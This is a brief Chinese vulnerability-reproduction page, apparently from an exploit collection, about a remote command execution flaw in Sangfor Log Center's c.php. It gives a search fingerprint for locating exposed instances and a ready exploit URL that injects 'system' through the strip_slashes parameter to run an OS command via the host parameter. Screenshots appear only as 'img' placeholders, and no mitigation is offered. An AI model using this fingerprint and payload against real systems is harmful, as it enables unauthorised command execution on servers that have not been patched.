跳转至

深信服 日志中心 c.php 远程命令执行漏洞

漏洞描述

深信服 日志中心 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行

漏洞影响

深信服 日志中心

网络测绘

body="isHighPerformance : !!SFIsHighPerformance,"

漏洞复现

登录页面如下

img

访问漏洞Url

/tool/log/c.php?strip_slashes=system&host=ipconfig

img